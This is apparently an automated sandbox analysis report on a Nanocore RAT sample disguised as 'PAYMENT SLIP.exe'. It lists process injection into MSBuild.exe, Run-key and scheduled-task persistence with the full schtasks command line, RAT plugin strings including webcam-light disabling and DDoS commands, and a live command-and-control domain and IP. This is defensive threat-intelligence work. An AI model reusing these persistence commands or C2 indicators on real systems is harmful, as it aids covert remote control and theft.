        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion:

        Maps a DLL or memory area into another process
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe protection: execute and read and writeJump to behavior
        Writes to foreign memory regions
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: 103E008Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: C0E008Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe base: A23008Jump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\Desktop\PAYMENT SLIP.exe' Jump to behavior
        Source: C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe 'C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe' Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp3E70.tmp'Jump to behavior
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Program Manager (IKEv2){DD7E8301-7047-4E86-A635-691AFA4197AE}y
        Source: MSBuild.exe, 0000000C.00000002.911166486.00000000036CA000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Progman
        Source: MSBuild.exe, 0000000C.00000002.910250249.000000000160F000.00000004.00000020.sdmpBinary or memory string: Program Managersoft.NET\Framework\v2.0.50727\MSBuild.exe
        Source: MSBuild.exe, 0000000C.00000002.910582114.0000000001C20000.00000002.00000001.sdmpBinary or memory string: Progmanlock
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpBinary or memory string: Program Managerr
        Source: MSBuild.exe, 0000000C.00000002.910278193.0000000001648000.00000004.00000020.sdmpBinary or memory string: Program Manager<
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PAYMENT SLIP.exeCode function: 1_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004035D8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information:

        Yara detected Nanocore RAT
        Source: Yara matchFile source: 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.914312313.00000000061A0000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.762317389.0000000003F11000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.753927401.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.745514113.00000000030B1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000013.00000002.744233608.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.909543177.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 5704, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6948, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6804, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6376, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: hmhrpib.exe PID: 6024, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6940, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: PAYMENT SLIP.exe PID: 6900, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6372, type: MEMORY
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.450c0f1.20.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.PAYMENT SLIP.exe.24e0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.PAYMENT SLIP.exe.3160000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.2.PAYMENT SLIP.exe.3050000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.hmhrpib.exe.2f30000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40feae4.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.4507ac8.19.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f59cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.40f9cae.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f6310d.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.MSBuild.exe.3f5eae4.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a4629.32.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.MSBuild.exe.61a0000.33.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.PAYMENT SLIP.exe.2400000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 19.2.MSBuild.exe.410310d.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.hmhrpib.exe.2f30000.4.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        Detected Nanocore Rat
        Source: PAYMENT SLIP.exe, 00000001.00000002.665787151.0000000002400000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: PAYMENT SLIP.exe, 00000006.00000002.693808017.0000000003160000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: hmhrpib.exe, 00000008.00000002.706739434.0000000002F30000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: PAYMENT SLIP.exe, 0000000A.00000002.723894048.00000000024E0000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 0000000C.00000002.911350836.00000000044FF000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
DPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttribute
System.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
        Source: MSBuild.exe, 0000000C.00000002.910984817.00000000034F4000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGui
dAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
        Source: hmhrpib.exe, 0000000D.00000002.732908055.0000000002F30000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000013.00000002.745550001.00000000040B1000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Source: PAYMENT SLIP.exe, 00000014.00000002.745571478.0000000003050000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Source: MSBuild.exe, 00000016.00000002.762297835.0000000002F11000.00000004.00000001.sdmp; String found in binary or memory: NanoCore.ClientPluginHost
        Yara detected Nanocore RAT
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 12_2_057D283A bind,12_2_057D283A
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe; Code function: 12_2_057D27E8 bind,12_2_057D27E8

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Scheduled Task/Job 1 | Scheduled Task/Job 1 | Access Token Manipulation 1 | Disable or Modify Tools 1 | Input Capture 11 | File and Directory Discovery 2 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
        Default Accounts | Scheduled Task/Job | Registry Run Keys / Startup Folder 1 | Process Injection 212 | Deobfuscate/Decode Files or Information 1 | LSASS Memory | System Information Discovery 15 | Remote Desktop Protocol | Input Capture 11 | Exfiltration Over Bluetooth | Encrypted Channel 12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Scheduled Task/Job 1 | Obfuscated Files or Information 2 | Security Account Manager | Security Software Discovery 111 | SMB/Windows Admin Shares | Clipboard Data 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Registry Run Keys / Startup Folder 1 | Software Packing 11 | NTDS | Process Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Masquerading 1 | LSA Secrets | Virtualization/Sandbox Evasion 31 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
        Replication Through Removable Media | Launchd | Rc.common | Rc.common | Virtualization/Sandbox Evasion 31 | Cached Domain Credentials | Application Window Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol 12 | Jamming or Denial of Service | | Abuse Accessibility Features
        External Remote Services | Scheduled Task | Startup Items | Startup Items | Access Token Manipulation 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 212 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
        Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Hidden Files and Directories 1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

        Behavior Graph

        [Figure: behavior graph. Behavior Graph ID: 412302; Sample: PAYMENT SLIP.exe; Startdate: 12/05/2021; Architecture: WINDOWS; Score: 100]


        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        PAYMENT SLIP.exe | 100% | Joe Sandbox ML |

        Dropped Files

        Source | Detection | Scanner | Label
        C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe | 100% | Joe Sandbox ML |
        C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe | 43% | ReversingLabs | Win32.Backdoor.Androm

        Unpacked PE Files

        Source | Detection | Scanner | Label
        10.2.PAYMENT SLIP.exe.23e0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        19.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        20.2.PAYMENT SLIP.exe.2f50000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        12.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        22.2.MSBuild.exe.400000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
        12.2.MSBuild.exe.4507ac8.19.unpack | 100% | Avira | TR/NanoCore.fadte
        12.2.MSBuild.exe.61a0000.33.unpack | 100% | Avira | TR/NanoCore.fadte
        1.2.PAYMENT SLIP.exe.3110000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
        6.2.PAYMENT SLIP.exe.3060000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

        Domains

        No Antivirus matches

        URLs

        Source | Detection | Scanner | Label
        23.254.130.71 | 1% | Virustotal |
        23.254.130.71 | 0% | Avira URL Cloud | safe
        seaudo.hopto.org | 0% | Avira URL Cloud | safe

        Domains and IPs

        Contacted Domains

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        seaudo.hopto.org | 23.254.130.71 | true | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          23.254.130.71 | true | 1%, Virustotal; Avira URL Cloud: safe | unknown
          seaudo.hopto.org | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_ErrorError | PAYMENT SLIP.exe | false | | high

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            23.254.130.71 | seaudo.hopto.org | United States | 54290 | HOSTWINDSUS | true

            General Information

            Joe Sandbox Version: 32.0.0 Black Diamond
            Analysis ID: 412302
            Start date: 12.05.2021
            Start time: 15:40:17
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 11m 18s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: PAYMENT SLIP.exe
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed: 30
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.troj.evad.winEXE@26/31@17/1
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 54.1% (good quality ratio 52.4%)
            • Quality average: 85.9%
            • Quality standard deviation: 23.7%
            HCA Information:
            • Successful, ratio: 94%
            • Number of executed functions: 521
            • Number of non-executed functions: 66
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
            • Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.43.193.48, 92.122.145.220, 13.88.21.125, 104.42.151.234, 20.82.209.183, 8.241.78.254, 67.26.73.254, 8.241.90.254, 8.241.83.126, 8.241.126.249, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154
            • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            15:41:13 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfx C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            15:41:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jnckjcfx C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            15:41:28 | API Interceptor | 2x Sleep call for process: hmhrpib.exe modified
            15:41:32 | API Interceptor | 752x Sleep call for process: MSBuild.exe modified
            15:41:34 | Task Scheduler | Run new task: DHCP Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" s>$(Arg0)

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASN

            Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\MSBuild.exe.log
            Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):325
            Entropy (8bit):5.334380084018418
            Encrypted:false
            SSDEEP:6:Q3LadLCR22IAQykdL1tZbLsbFLIP12MUAvvro6ysGMFLIP12MUAvvrs:Q3LaJU20NaL1tZbgbe4MqJsGMe4M6
            MD5:65CE98936A67552310EFE2F0FF5BDF88
            SHA1:8133653A6B9A169C7496ADE315CED322CFC3613A
            SHA-256:682F7C55B1B6E189D17755F74959CD08762F91373203B3B982ACFFCADE2E871A
            SHA-512:2D00AC024267EC384720A400F6D0B4F7EDDF49FAF8AB3C9E6CBFBBAE90ECADACA9022B33E3E8EC92E4F57C7FC830299C8643235EB4AA7D8A6AFE9DD1775F57C3
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..2,"Microsoft.Build.Engine, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build.Framework, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
            C:\Users\user\AppData\Local\Temp\nsb1C63.tmp\qm1tw12xr.dll
            Process:C:\Users\user\AppData\Roaming\tteegmiuoefs\hmhrpib.exe
            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):4608
            Entropy (8bit):3.7496483038392974
            Encrypted:false
            SSDEEP:48:Sa/T+kBvwunRLZ6AL0rpRVaS53RS9BNZYWrTZxZ4Vo:+kBvFLgALER8S53RS9dtng
            MD5:EE2F349BA112FE569BD9AB1368E65791
            SHA1:9CEB495D81A804E604111D98C1169B4A9B640510
            SHA-256:5A97B6F5313D875AE40429BB27D486F7B745EEFDF5C116E434DC08770923FA9F
            SHA-512:D4CD1A797307B4FC4D9C3E80979BDDE682F64931FCF6D9CFCAE333646A242C143C2F77D2D6A80E01452A614E7981339E7E17580871B48518DC71A58339970B64
            Malicious:false
            C:\Users\user\AppData\Local\Temp\nsd2D5A.tmp
            Process:C:\Users\user\Desktop\PAYMENT SLIP.exe
            File Type:data
